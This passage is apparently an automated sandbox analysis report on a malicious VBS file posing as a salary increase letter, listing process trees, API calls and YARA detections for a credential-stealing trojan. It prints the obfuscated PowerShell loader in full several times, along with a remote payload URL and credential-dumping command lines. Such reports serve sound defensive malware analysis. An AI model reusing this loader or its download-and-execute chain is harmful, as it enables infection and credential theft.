              Source: msiexec.exe, 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bins
              Source: powershell.exe, 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2303486839.000001ACE55B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2467560447.0000000004381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2467560447.00000000044D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617219052.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617410660.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2619527438.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617386032.00000000034ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 00000007.00000002.3472489683.00000000222F0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 0000000E.00000003.2617219052.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617410660.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2619527438.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2617386032.00000000034ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.compData
              Source: msiexec.exe, 00000007.00000002.3472489683.00000000222F0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
              Source: msiexec.exe, 0000000A.00000002.2643350268.00000000029C4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
              Source: msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
              Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
              Source: msiexec.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0041183A OpenClipboard,GetLastError,10_2_0041183A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,10_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_004072B5

              E-Banking Fraud

              Source: Yara match File source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR

              System Summary

              Source: Initial file: Call Caricologist.ShellExecute(Fluvious, Chr(34) & Angry & Chr(34), "", "", Indhftes)
              Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. 
Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00401806 NtdllDefWindowProc_W,10_2_00401806
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004018C0 NtdllDefWindowProc_W,10_2_004018C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004016FD NtdllDefWindowProc_A,13_2_004016FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004017B7 NtdllDefWindowProc_A,13_2_004017B7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
              Source: Salary Increase Letter_Oct 2024.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4947
              Source: unknownProcess created: Commandline size = 4947
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@18/10@2/3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,10_2_004182CE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,14_2_00410DE1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,10_2_00418758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,10_2_00413D4C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,10_2_004148B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Lokumernes.sus
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-KC5V8F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_by2ssk52.nr3.ps1
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=948
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4900
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 00000007.00000002.3473023585.0000000022760000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exe, 0000000A.00000003.2635522754.0000000004F1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643972273.0000000004F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Salary Increase Letter_Oct 2024.vbsVirustotal: Detection: 7%
              Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-33249
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. 
Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. 
Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe"
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
